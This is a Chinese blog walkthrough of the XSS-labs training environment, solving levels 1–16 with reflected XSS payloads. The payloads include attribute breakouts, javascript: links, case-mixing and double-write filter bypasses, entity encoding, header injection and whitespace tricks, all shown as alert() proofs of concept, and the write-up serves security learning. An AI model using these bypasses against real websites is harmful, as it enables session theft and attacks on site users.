双层小牛堡

XSS-labs

XSS常见的触发标签_xss标签_H3rmesk1t的博客-CSDN博客

该补习补习xss漏洞了

漏洞原理

网站存在静态和动态网站

xss 针对的网站就是动态网站

动态网站

会根据 用户的环境  与 需求 反馈出 不同的响应


静态页面 

代码写死了  只会存在代码中有的内容

通过动态网站用户体验会大大加深但是会存在漏洞 xss

XSS 是一种注入漏洞

通过用户输入 在代码页中插入 恶意语句 从而实现注入

攻击成功 可以获取但不止 COOKIE 会话 和 隐私页面

首先我们来看看最简单

然后我们通过 get 传递漏洞

xss需要通过php的输出指令来输出

我们通过做题目来继续了解吧

打开靶场

Level1 【无过滤】

我们能发现这三个地方

然后我们回去看看源代码

能发现我们输入什么他就存储在源代码什么

这里就是动态的

如果和sql注入一样我们插入恶意代码呢



这里通过 alert 来弹窗

这里 script 表示 JavaScript代码 / 表示结束了



那么这里插入后

欢迎用户test1


就变为了


欢迎用户test1



实现了 alert 弹窗

我们就实现了第一题

Level2 【参数】

我们依然看看源代码

这里我们发现了我们输入的值被当做参数了

value="1">

这里我们就想到了 sql注入的闭合了

"> 就会实现xss注入

所以payload 就是

">

">  <"

PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+ 为 <sricpt>alert()</sricpt></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/f91c5b2805ed434ca32d54826bcfa661.jpg" target="_blank"><img alt="XSS-labs_第7张图片" height="184" src="http://img.e-com-net.com/image/info8/f91c5b2805ed434ca32d54826bcfa661.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p></p> 
  <h2>Level3   【htmlspecialchars】</h2> 
  <p>我们查看代码 没有发现和上一题有什么不一样的</p> 
  <p>所以我们去继续使用上题的payload</p> 
  <pre><code>"><script>alert(1)</script></code></pre> 
  <p> <a href="http://img.e-com-net.com/image/info8/38472eed682542b096488062d0f23e14.jpg" target="_blank"><img alt="XSS-labs_第8张图片" height="122" src="http://img.e-com-net.com/image/info8/38472eed682542b096488062d0f23e14.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>发现被实体化了</p> 
  <p>并且只过滤了  <></p> 
  <p>这里我们就需要想到是htmlspecialchars</p> 
  <p>我们去看xsslab源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/ea44a4f21ee1422c959a9f1ab416eea8.jpg" target="_blank"><img alt="XSS-labs_第9张图片" height="138" src="http://img.e-com-net.com/image/info8/ea44a4f21ee1422c959a9f1ab416eea8.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>确实是这样</p> 
  <p><a href="http://img.e-com-net.com/image/info8/9e51e959e62648ad82bd36f9a4d2270b.jpg" target="_blank"><img alt="XSS-labs_第10张图片" height="396" src="http://img.e-com-net.com/image/info8/9e51e959e62648ad82bd36f9a4d2270b.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>这里其实预定义了转义的内容  因为单引号没有被转义 但是其实可以实现的</p> 
  <pre><code>&：转换为&amp;
"：转换为&quot;
'：转换为成为 '
<：转换为&lt;
>：转换为&gt;
</code></pre> 
  <p>发现就是为了让 <>里面的转变为字符串 失去闭合作用</p> 
  <h3>单引号绕过</h3> 
  <p>这里我们需要通过 ' 绕过</p> 
  <pre><code>因为我们的<> 会被实体化

所以我们需要运用不需要<>的payload

我们可以利用 onfocus 事件
</code></pre> 
  <h3>onfocus事件</h3> 
  <pre><code>当 页面中存在 输入框等 需要存在点击的界面时

onfocus 就可以被触发

</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/6336cecbd77c4f529b405841bb36ef5b.jpg" target="_blank"><img alt="XSS-labs_第11张图片" height="157" src="http://img.e-com-net.com/image/info8/6336cecbd77c4f529b405841bb36ef5b.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>这里就存在一个很明显的例子</p> 
  <p>既然 onfocus可以出发函数 那么我们就可以通过执行</p> 
  <p>这里就可以写入payload</p> 
  <pre><code>onfocus=javascript:alert()</code></pre> 
  <p>这样就可以绕过 过滤 <></p> 
  <p>那我们如何执行呢</p> 
  <pre><code>我们输入一个 ' 时

变成了下面这个
value="" '="">



我们输入 'abcd'

变为了

value="" abcd''="">


我们输入 payload

' onfocus=javascript:alert(1) ' 

就会变为

value=""  onfocus=javascript:alert(1) '' ="">

从而实现了闭合</code></pre> 
  <p>所以最终payload</p> 
  <pre><code>' onfocus=javascript:alert(1) '</code></pre> 
  <h2>Level4   【过滤><】</h2> 
  <p>我们首先可以判断是否存在过滤</p> 
  <pre><code>'"&<></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/d8d3a978174641e98fe77c5e9010e380.jpg" target="_blank"><img alt="XSS-labs_第12张图片" height="116" src="http://img.e-com-net.com/image/info8/d8d3a978174641e98fe77c5e9010e380.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>发现只有3个了 过滤了 <></p> 
  <p>用上题目的payload</p> 
  <pre><code>' onfocus=javascript:alert(1) '</code></pre> 
  <p>失效了</p> 
  <p>我们看看代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/94ee30b14a594c2b99b347bec981e859.jpg" target="_blank"><img alt="" height="83" src="http://img.e-com-net.com/image/info8/94ee30b14a594c2b99b347bec981e859.jpg" width="569"></a></p> 
  <p>进行修改payload</p> 
  <pre><code>" onfocus=javascript:alert(1) '</code></pre> 
  <h2>Level5   【过滤script】</h2> 
  <p>我们使用第一题的payload直接上去</p> 
  <p><a href="http://img.e-com-net.com/image/info8/b7e9e68a09c34d55acd67189188b62d0.jpg" target="_blank"><img alt="" height="65" src="http://img.e-com-net.com/image/info8/b7e9e68a09c34d55acd67189188b62d0.jpg" width="282"></a></p> 
  <p>发现 script 变为了 scr_ipt</p> 
  <p>我们去看看源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/a2df0926a3c646f3b7bedb9d66845e7d.jpg" target="_blank"><img alt="XSS-labs_第13张图片" height="161" src="http://img.e-com-net.com/image/info8/a2df0926a3c646f3b7bedb9d66845e7d.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>发现过滤了 on 和 script</p> 
  <p>所以我们使用其他方式</p> 
  <h3>a herf</h3> 
  <pre><code><html
<p>123</p>
<a href=javascript:alert("yes")>xxxxxx</a>
</html></code></pre> 
  <p>我们先给出payload</p> 
  <p>然后我们解释一下</p> 
  <p><a href="http://img.e-com-net.com/image/info8/3edd6c52305a4df8b6438905044ddaf2.jpg" target="_blank"><img alt="XSS-labs_第14张图片" height="132" src="http://img.e-com-net.com/image/info8/3edd6c52305a4df8b6438905044ddaf2.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>通过 a标签 然后点击 我们可以实现跳转等操作</p> 
  <p>既然可以实现跳转 那我们也可以实现 执行JavaScript命令</p> 
  <p>我们开始做题</p> 
  <p>我们先传入内容</p> 
  <pre><code><a href=javascript:alert()>xxxxxx</a></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/602016a767264a078ce5403fb0189470.jpg" target="_blank"><img alt="" height="69" src="http://img.e-com-net.com/image/info8/602016a767264a078ce5403fb0189470.jpg" width="454"></a></p> 
  <p>我们需要闭合 所以修改paylaod</p> 
  <pre><code>"> <a href=javascript:alert()>xxxxx</a></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/d246f7e90bb246afb2a98b489f1fb2f2.jpg" target="_blank"><img alt="XSS-labs_第15张图片" height="103" src="http://img.e-com-net.com/image/info8/d246f7e90bb246afb2a98b489f1fb2f2.jpg" width="358" style="border:1px solid black;"></a></p> 
  <p>还需要将后面的 "> 闭合</p> 
  <p>所以最后的payload为</p> 
  <pre><code>"> <a href=javascript:alert()>xxxxx</a> <"</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/508794bdc4534840b99118d6eac46a42.jpg" target="_blank"><img alt="XSS-labs_第16张图片" height="181" src="http://img.e-com-net.com/image/info8/508794bdc4534840b99118d6eac46a42.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>点击即可实现</p> 
  <h2>Level6   【过滤 a href】</h2> 
  <p>我们把上面的 payload 丢进去看看</p> 
  <p><a href="http://img.e-com-net.com/image/info8/99774aa8574e4d46b8449cc7d6beef8f.jpg" target="_blank"><img alt="" height="77" src="http://img.e-com-net.com/image/info8/99774aa8574e4d46b8449cc7d6beef8f.jpg" width="530"></a></p> 
  <p>发现 过滤 了 a href</p> 
  <p><a href="http://img.e-com-net.com/image/info8/9f0f26a01d754501bb5cb7f7fd0d0442.png" target="_blank"><img alt="XSS-labs_第17张图片" height="200" src="http://img.e-com-net.com/image/info8/9f0f26a01d754501bb5cb7f7fd0d0442.png" width="500" style="border:1px solid black;"></a></p> 
  <p>但是放出来了 大小写 所以我们可以</p> 
  <h3>大小写绕过</h3> 
  <p>"> <ScRipt>alert()</ScRipt> <"</p> 
  <p>或者</p> 
  <p>"> <a HrEf=javascript:alert()>xxxx</a> <"</p> 
  <p>又或者</p> 
  <p>" Onfocus=javascript:alert() "</p> 
  <h2>Level7  【替换为空】</h2> 
  <p>我们先上关键词看看</p> 
  <pre><code>" Onfocus <ScRipt> <a Href=javascript:alert()></code></pre> 
  <p>能发现返回值是</p> 
  <p><a href="http://img.e-com-net.com/image/info8/486dc7e708fd4b57a34c6f80fb07b8de.jpg" target="_blank"><img alt="" height="66" src="http://img.e-com-net.com/image/info8/486dc7e708fd4b57a34c6f80fb07b8de.jpg" width="380"></a></p> 
  <pre><code>" focus <> <a =java:alert()></code></pre> 
  <p>全部替换为空了</p> 
  <p>这里我们使用</p> 
  <h3>双写绕过</h3> 
  <p>开始构造</p> 
  <pre><code>" OOnnfocus=javascscriptript:alert() "

"> <a hrhrefef=javascscriptript:alert()>xx</a> <"</code></pre> 
  <h2>Level8   【a href标签自动url解码】</h2> 
  <p>更新一下 关键词</p> 
  <pre><code>" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()></code></pre> 
  <p>看看过滤了啥</p> 
  <p><a href="http://img.e-com-net.com/image/info8/a710508f5f4d45cbb4fc72d85bbc407a.jpg" target="_blank"><img alt="XSS-labs_第18张图片" height="148" src="http://img.e-com-net.com/image/info8/a710508f5f4d45cbb4fc72d85bbc407a.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p><a href="http://img.e-com-net.com/image/info8/4b6749ba585b4147b1e4fb901fcdd430.png" target="_blank"><img alt="XSS-labs_第19张图片" height="225" src="http://img.e-com-net.com/image/info8/4b6749ba585b4147b1e4fb901fcdd430.png" width="579" style="border:1px solid black;"></a></p> 
  <p>这里为什么我们无法直接通过input来xss 因为存在 htmlspecialchars函数 会吧我们输入的内容</p> 
  <p>直接作为字符串输出</p> 
  <p><a href="http://img.e-com-net.com/image/info8/677adc0da54f4f28981aca0ff4cbf077.jpg" target="_blank"><img alt="XSS-labs_第20张图片" height="109" src="http://img.e-com-net.com/image/info8/677adc0da54f4f28981aca0ff4cbf077.jpg" width="584" style="border:1px solid black;"></a></p> 
  <p>引号被过滤了 无法实现闭合</p> 
  <p></p> 
  <p>所以没有用了</p> 
  <p>我们需要通过下面的 a href标签输出了</p> 
  <p>但是下面又存在过滤</p> 
  <p>我们如何实现呢</p> 
  <p>其实</p> 
  <h4>a href 存在自动解密 url的功能</h4> 
  <p>所以我们只需要通过编码绕过 过滤 如何通过 a href 编码执行即可</p> 
  <pre><code>javascript:alert()


&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;


unicode编码</code></pre> 
  <p>直接输入即可</p> 
  <p>然后点击 友情链接即可</p> 
  <h2>Level9   【判断http在不在标签内】</h2> 
  <p>我们看看源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/baa19d63c0c84c9c878e01c000bffe14.jpg" target="_blank"><img alt="XSS-labs_第21张图片" height="156" src="http://img.e-com-net.com/image/info8/baa19d63c0c84c9c878e01c000bffe14.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>strpos 查看 http://是否在 输入里面 如果不在 输出不合法</p> 
  <p>这里就好办了</p> 
  <p>我们通过注释输入http://即可</p> 
  <p>运用上一道题目的payload</p> 
  <pre><code>&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41; /* http:// */</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/6e1c6a1548b247ee87a18109e835c4a8.jpg" target="_blank"><img alt="XSS-labs_第22张图片" height="136" src="http://img.e-com-net.com/image/info8/6e1c6a1548b247ee87a18109e835c4a8.jpg" width="574" style="border:1px solid black;"></a></p> 
  <p>这里就看到 http:// 是被注释掉了</p> 
  <h2 style="background-color:transparent;">Level10 【闭合 fake hidden】</h2> 
  <p>看看源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/350b904aa5a84717a68eacc19adbbf53.jpg" target="_blank"><img alt="XSS-labs_第23张图片" height="212" src="http://img.e-com-net.com/image/info8/350b904aa5a84717a68eacc19adbbf53.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>发现需要另一个来传递</p> 
  <p>我们这里并且过滤了 <></p> 
  <p>但是其实还是很简单的</p> 
  <pre><code class="hljs">" onfocus=javascript:alert() " type=text</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/6c537bbeda4f4747842072783b57eca7.jpg" target="_blank"><img alt="XSS-labs_第24张图片" height="365" src="http://img.e-com-net.com/image/info8/6c537bbeda4f4747842072783b57eca7.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2> Level11  【Referer注入】</h2> 
  <p>我们再来看看源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/4ec00b5cae824b05a8befd87b28195c6.jpg" target="_blank"><img alt="XSS-labs_第25张图片" height="266" src="http://img.e-com-net.com/image/info8/4ec00b5cae824b05a8befd87b28195c6.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>通过referer</p> 
  <p>为什么无法通过 t_sort</p> 
  <p>因为 htmlspecialchars 无法闭合 " 会被实体化</p> 
  <p>所以我们通过 referer来进行 xss</p> 
  <p>referer 的内容 就和 上面一样</p> 
  <pre><code class="hljs">" onfocus=javascript:alert() " type=text</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/36627141a66649308f28955d10518690.jpg" target="_blank"><img alt="XSS-labs_第26张图片" height="207" src="http://img.e-com-net.com/image/info8/36627141a66649308f28955d10518690.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p><a href="http://img.e-com-net.com/image/info8/798f24db0b2e49e483059ab23615b36f.jpg" target="_blank"><img alt="XSS-labs_第27张图片" height="412" src="http://img.e-com-net.com/image/info8/798f24db0b2e49e483059ab23615b36f.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2 style="background-color:transparent;">Level12 【UA注入】</h2> 
  <pre><code class="hljs">" onfocus=javascript:alert() " type=text</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/7b270c86d68543b5992c04257c464c1b.jpg" target="_blank"><img alt="XSS-labs_第28张图片" height="239" src="http://img.e-com-net.com/image/info8/7b270c86d68543b5992c04257c464c1b.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p><a href="http://img.e-com-net.com/image/info8/e3beac2944e84fd6a2b1afe4cf77e3d2.jpg" target="_blank"><img alt="XSS-labs_第29张图片" height="409" src="http://img.e-com-net.com/image/info8/e3beac2944e84fd6a2b1afe4cf77e3d2.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2>Level13 【cookie注入】</h2> 
  <pre><code class="hljs">" onfocus=javascript:alert() " type=text</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/c42c349025ff4912b2641b9c1e1158bd.jpg" target="_blank"><img alt="XSS-labs_第30张图片" height="350" src="http://img.e-com-net.com/image/info8/c42c349025ff4912b2641b9c1e1158bd.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2>Level14  【通过图片属性实现xss】</h2> 
  <p>这里我的小皮环境有问题 无法实现文件上传</p> 
  <p>这里 主要就是通过 图片的属性解析 然后我们写入 xss语句</p> 
  <p>这样就会报错</p> 
  <p>[靶场] XSS-Labs 14-20_3hex的博客-CSDN博客</p> 
  <h2>Level15   【通过src访问文件执行】</h2> 
  <p>这里的意思就是src是访问了 一个图片</p> 
  <p>那我们可以通过这个src访问第一题的php 然后通过 第一题的php来执行</p> 
  <p>但是我还是无法实现 可能我php没开启属性</p> 
  <p>xss-labs靶场实战全通关详细过程（xss靶场详解）-CSDN博客</p> 
  <h2>Level16   【绕过空格】</h2> 
  <p>XSS常见的触发标签_xss标签_H3rmesk1t的博客-CSDN博客</p> 
  <p><a href="http://img.e-com-net.com/image/info8/52cd5b797c2c4575b8ae79fcf11e967c.png" target="_blank"><img alt="XSS-labs_第31张图片" height="189" src="http://img.e-com-net.com/image/info8/52cd5b797c2c4575b8ae79fcf11e967c.png" width="460" style="border:1px solid black;"></a></p> 
  <p>查看代码</p> 
  <p>发现过滤了 空格 和 /</p> 
  <p>首先就是查找一个不需要/的触发标签</p> 
  <p>这里我选择</p> 
  <pre><code class="hljs"><video><source onerror="alert(1)"></code></pre> 
  <p>其次需要绕过空格</p> 
  <p>我们可以首先看看 这两个空格是什么编码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/06be95b52b5244e8b1287ec478b7786d.jpg" target="_blank"><img alt="XSS-labs_第32张图片" height="630" src="http://img.e-com-net.com/image/info8/06be95b52b5244e8b1287ec478b7786d.jpg" width="539" style="border:1px solid black;"></a></p> 
  <p>那么这里面我们可以使用 %0a绕过</p> 
  <p>所以payload就是</p> 
  <pre><code class="hljs"><video><source%0Aonerror="alert(1)"></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/8abec2205a354952b6dbaf6d730973b9.jpg" target="_blank"><img alt="XSS-labs_第33张图片" height="544" src="http://img.e-com-net.com/image/info8/8abec2205a354952b6dbaf6d730973b9.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2>Level17</h2> 
  <p>后面是 flash的插件了</p> 
  <p>我觉得没有必要做了 因为现在 flash已经被大多数浏览器抛弃了</p> 
  <p></p> 
 </div> 
</div>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1708452222792183808"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(WEB,xss,安全,前端)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1903560587523190784.htm"
                           title="Midscene.js 简介" target="_blank">Midscene.js 简介</a>
                        <span class="text-muted">有个人神神叨叨</span>
<a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/ai/1.htm">ai</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a>
                        <div>名称：Midscene.js口号：JoyfulAutomationbyAI（通过AI实现愉悦的自动化）官网：https://midscenejs.com/项目地址：https://github.com/web-infra-dev/midscene社区链接：Twitter：https://x.com/midscene_aiDiscord：https://discord.gg/2JyBHxszE4La</div>
                    </li>
                    <li><a href="/article/1903554274240032768.htm"
                           title="Kotlin关键字总结" target="_blank">Kotlin关键字总结</a>
                        <span class="text-muted">萌新洛尘</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a><a class="tag" taget="_blank" href="/search/Kotlin/1.htm">Kotlin</a><a class="tag" taget="_blank" href="/search/kotlin/1.htm">kotlin</a>
                        <div>Kotlin关键字可分为三类：1、硬关键字：这些关键字无论在什么情况下都不能用作标识符。2、软关键字：这些关键字可以在它们不起作用的上下文中用作标识符。3、修饰符关键字：这些关键字也可以在代码中用作标识符。一、硬关键字：as一一用于做类型转换或为import语句指定别名as?一一类型安全的类型转换运算符。break一一中断循环class一一声明类。continue一忽略本次循环剩下的语句，重新开始</div>
                    </li>
                    <li><a href="/article/1903551625578999808.htm"
                           title="芯片的未来发展趋势" target="_blank">芯片的未来发展趋势</a>
                        <span class="text-muted">iccnewer</span>

                        <div>2024年，该行业将专注于AI/ML、RISC-V、量子、安全等发展趋势。今年年初，大多数人从未听说过生成式人工智能。现在整个世界都在竞相利用它，而这仅仅是个开始。量子计算、6G、智能基础设施等新市场领域专用处理正在加速对更快、更高效、更多数据的需求。与每隔几年等待下一个工艺节点的日子相比，未来几年的事件将与电话或汽车的引入一样重要。但可能不会只有一种创新技术，将会有很多技术一起以一种将让科技界惊</div>
                    </li>
                    <li><a href="/article/1903550490524839936.htm"
                           title="spring MVC 介绍" target="_blank">spring MVC 介绍</a>
                        <span class="text-muted">LCY133</span>
<a class="tag" taget="_blank" href="/search/spring%E5%90%8E%E7%AB%AF/1.htm">spring后端</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/mvc/1.htm">mvc</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>SpringMVC是Spring框架中用于构建Web应用的核心模块，基于MVC设计模式（Model-View-Controller）实现。以下是其核心概念的整理：1.MVC设计模式•Model（模型）：封装业务数据和业务逻辑（如POJO对象、Service层）。•View（视图）：负责数据展示（如JSP、Thymeleaf、HTML）。•Controller（控制器）：接收请求，调用业务逻辑，返回</div>
                    </li>
                    <li><a href="/article/1903550491518889984.htm"
                           title="springboot 项目如何提高并发量" target="_blank">springboot 项目如何提高并发量</a>
                        <span class="text-muted">LCY133</span>
<a class="tag" taget="_blank" href="/search/spring%E5%90%8E%E7%AB%AF/1.htm">spring后端</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a>
                        <div>提升基于SpringBoot的Web项目并发量需要从应用优化、数据库调优、缓存策略、异步处理、水平扩展等多方面综合改进。以下是具体方案和实践建议：一、应用层优化1.代码性能优化•避免阻塞操作：减少同步锁、长事务、大文件处理等耗时操作。•优化SQL查询：避免N+1查询，使用索引，减少全表扫描。•复用对象：避免频繁创建大对象（如JSON解析工具），使用线程安全对象池。2.线程池配置•调整Web服务器线</div>
                    </li>
                    <li><a href="/article/1903545697416835072.htm"
                           title="静态html 500错误,HTTP-500错误" target="_blank">静态html 500错误,HTTP-500错误</a>
                        <span class="text-muted">金门走狗</span>
<a class="tag" taget="_blank" href="/search/%E9%9D%99%E6%80%81html/1.htm">静态html</a><a class="tag" taget="_blank" href="/search/500%E9%94%99%E8%AF%AF/1.htm">500错误</a>
                        <div>http500内部服务器(HTTP-InternalServerError)错误说明IIS服务器无法解析ASP代码，访问一个静态页面试试是否也出现这个问题，如果访问静态页面没问题，那就要分以下几种情况来分析了：①你是否改变过计算机名称。②站点所在的文件目录是否自定义了安全属性。③安装了域控制器后是否调整了域策略。如果是其中的一种情况，请一一将改变的参数设置回来看是否解决问题。如果静态空间也无法访问</div>
                    </li>
                    <li><a href="/article/1903544435199766528.htm"
                           title="学习记录之游标翻页实现" target="_blank">学习记录之游标翻页实现</a>
                        <span class="text-muted">sjsjsbbsbsn</span>
<a class="tag" taget="_blank" href="/search/Java%E5%AD%A6%E4%B9%A0%E4%B9%8B%E8%B7%AF/1.htm">Java学习之路</a><a class="tag" taget="_blank" href="/search/%E9%A1%B9%E7%9B%AE%E5%AE%9E%E6%88%98%E6%8A%80%E5%B7%A7/1.htm">项目实战技巧</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a>
                        <div>游标翻页本方案参考mallchat实现一.深翻页问题普通翻页前端一般会有个分页条。能够指定一页的条数，以及任意选择查看第几页,假设我们想查询第11页的内容传递过来的参数为:pageNo=11，pageSize=10对应的sql查询为:select*fromtablelimit100,10其中100代表需要跳过的条数，10代表跳过指定条数后，往后需要再取的条数。假设翻页到1w条,那我们要先扫描到这1</div>
                    </li>
                    <li><a href="/article/1903541912149749760.htm"
                           title="SAP ABAP 调用 DeepSeek，API Key 存在什么地方最安全？" target="_blank">SAP ABAP 调用 DeepSeek，API Key 存在什么地方最安全？</a>
                        <span class="text-muted">汪子熙</span>
<a class="tag" taget="_blank" href="/search/ABAP/1.htm">ABAP</a><a class="tag" taget="_blank" href="/search/%E7%99%BE%E7%A7%91%E5%85%A8%E4%B9%A6/1.htm">百科全书</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/ABAP/1.htm">ABAP</a><a class="tag" taget="_blank" href="/search/NetWeaver/1.htm">NetWeaver</a><a class="tag" taget="_blank" href="/search/%E6%80%9D%E7%88%B1%E6%99%AE/1.htm">思爱普</a>
                        <div>笔者最近在处理一个SAP电商云和SAPS/4HANA集成后商品库存显示不同步的棘手问题。DeepSeek和ChatGPT没能帮上忙，最后还是查公司内网wiki搞定了。DeepSeek和ChatGPT确实不是万能的。ChatGPT3.5刚发布不久，我记得很多朋友聊起过大语言模型的「讨好型人格」，即倾向于迎合用户的观点、顺从用户的意愿。甚至在极端情况下，当用户对其回复提出质疑时，它会马上认怂，承认自己</div>
                    </li>
                    <li><a href="/article/1903539515432169472.htm"
                           title="常用的API设计都有哪些风格？优劣势？" target="_blank">常用的API设计都有哪些风格？优劣势？</a>
                        <span class="text-muted">PhilipJ0303</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/API%E8%AE%BE%E8%AE%A1/1.htm">API设计</a><a class="tag" taget="_blank" href="/search/%E6%8E%A5%E5%8F%A3/1.htm">接口</a>
                        <div>API设计是软件开发中非常重要的一部分，良好的API设计可以提高系统的可维护性、扩展性和易用性。常见的API设计风格主要有以下几种：1.RESTfulAPI3.gRPC4.SOAP（SimpleObjectAccessProtocol）5.WebSocket6.RPC（RemoteProcedureCall）7.Webhook总结风格适用场景优点缺点RESTfulWeb、移动端、简单CRUD操作简</div>
                    </li>
                    <li><a href="/article/1903539128113360896.htm"
                           title="如何解决MySQL 的深度分页问题？" target="_blank">如何解决MySQL 的深度分页问题？</a>
                        <span class="text-muted">运维小雅</span>
<a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a>
                        <div>前言在构建高性能、可扩展的Web应用程序时，数据库查询性能往往是影响整体系统响应速度的关键因素之一。尤其是在处理大规模数据时，如何高效地进行分页查询成为了开发者需要重点关注的问题。本文将深入探讨MySQL中LIMIT...OFFSET...语法带来的性能挑战，并介绍一种更高效的解决方案——游标分页方法（CursorPagination）。背景介绍假设我们有一个包含500万条记录的表my_table</div>
                    </li>
                    <li><a href="/article/1903538623685390336.htm"
                           title="Python, C ++开发工厂管理APP" target="_blank">Python, C ++开发工厂管理APP</a>
                        <span class="text-muted">Geeker-2025</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a>
                        <div>开发一款通用的**工厂管理App**，结合Python和C++的优势，可以实现高效的后端数据处理、实时的生产监控以及用户友好的前端界面。以下是一个详细的开发方案，涵盖技术选型、功能模块、开发步骤等内容。##技术选型###后端（Python）-**编程语言**：Python-**Web框架**：Django或Flask-**数据库**：PostgreSQL或MySQL-**实时通信**：WebSoc</div>
                    </li>
                    <li><a href="/article/1903536859359801344.htm"
                           title="CEF 控制台添加一函数，枚举 注册的供前端使用的CPP交互函数有哪些" target="_blank">CEF 控制台添加一函数，枚举 注册的供前端使用的CPP交互函数有哪些</a>
                        <span class="text-muted">清水迎朝阳</span>
<a class="tag" taget="_blank" href="/search/CEF%E5%BA%94%E7%94%A8/1.htm">CEF应用</a><a class="tag" taget="_blank" href="/search/CEF/1.htm">CEF</a><a class="tag" taget="_blank" href="/search/%E4%BA%A4%E4%BA%92/1.htm">交互</a><a class="tag" taget="_blank" href="/search/%E6%B3%A8%E5%85%A5%E5%87%BD%E6%95%B0/1.htm">注入函数</a><a class="tag" taget="_blank" href="/search/%E6%B3%A8%E5%86%8C/1.htm">注册</a><a class="tag" taget="_blank" href="/search/CPP/1.htm">CPP</a>
                        <div>一、前序知识1、设置单进程模式，方便调试voidClientApp::OnBeforeCommandLineProcessing(constCefString&process_type,CefRefPtrcommand_line){if(process_type.empty()){//cef在debug模式下有问题#ifdef_DEBUGcommand_line->AppendSwitchWith</div>
                    </li>
                    <li><a href="/article/1903528920985169920.htm"
                           title="java毕业设计，网上商城系统" target="_blank">java毕业设计，网上商城系统</a>
                        <span class="text-muted">爱编程的小哥</span>
